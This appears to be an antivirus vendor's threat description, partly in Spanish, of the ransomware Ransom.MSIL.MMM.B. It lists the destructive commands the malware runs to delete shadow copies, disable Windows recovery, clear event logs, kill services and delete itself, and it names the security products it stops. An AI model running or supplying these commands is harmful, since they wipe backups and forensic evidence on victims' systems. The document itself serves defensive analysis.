Ransom.MSIL.MMM.B

Instalación

Infiltra los archivos siguientes:

• {Malware Folder}\selfd.bat → to delete self and bat file
• {Encrypted Folder}\{Generated Hash from File Path and Name}.info → contains encryption info of encrypted file

Agrega los procesos siguientes:

• To disable specific services
  • %System%\cmd.exe /C sc.exe config SstpSvc start=disabled
  • %System%\cmd.exe /C sc.exe config SQLWriter start=disabled
  • %System%\cmd.exe /C sc.exe config SQLTELEMETRY$ECWDB2 start=disabled
  • %System%\cmd.exe /C sc.exe config SQLTELEMETRY start=disabled
• To disable system recovery(Delete Shadows, Disable Windows Recovery)
  • %System%\cmd.exe /C vssadmin.exe delete shadows /all /Quiet/C WMIC.exe shadowcopy delete
  • %System%\cmd.exe /C Bcdedit.exe /set {default} recoveryenabled no
  • %System%\cmd.exe /C Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
• To terminate specific processes
  • %System%\cmd.exe /C taskkill.exe /IM mspub.exe /F
  • %System%\cmd.exe /C taskkill.exe /IM sqlwriter.exe /F
• To clear Application, Security and System Logs
  • %System%\cmd.exe /C wevtutil.exe cl Application
  • %System%\cmd.exe /C wevtutil.exe cl Security
  • %System%\cmd.exe /C wevtutil.exe cl System
• To delete self
  • %System%\cmd.exe /C {Malware Folder}\selfd.bat

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).

Finalización del proceso

Finaliza los servicios siguientes si los detecta en el sistema afectado:

• McAfeeDLPAgentService
• avpsus
• mfewk
• BMR Boot Service
• NetBackup BMR MTFTP Service

Otros detalles

Hace lo siguiente:

• Modifies SystemTime and sets it to March 3, 1955 6:00 PM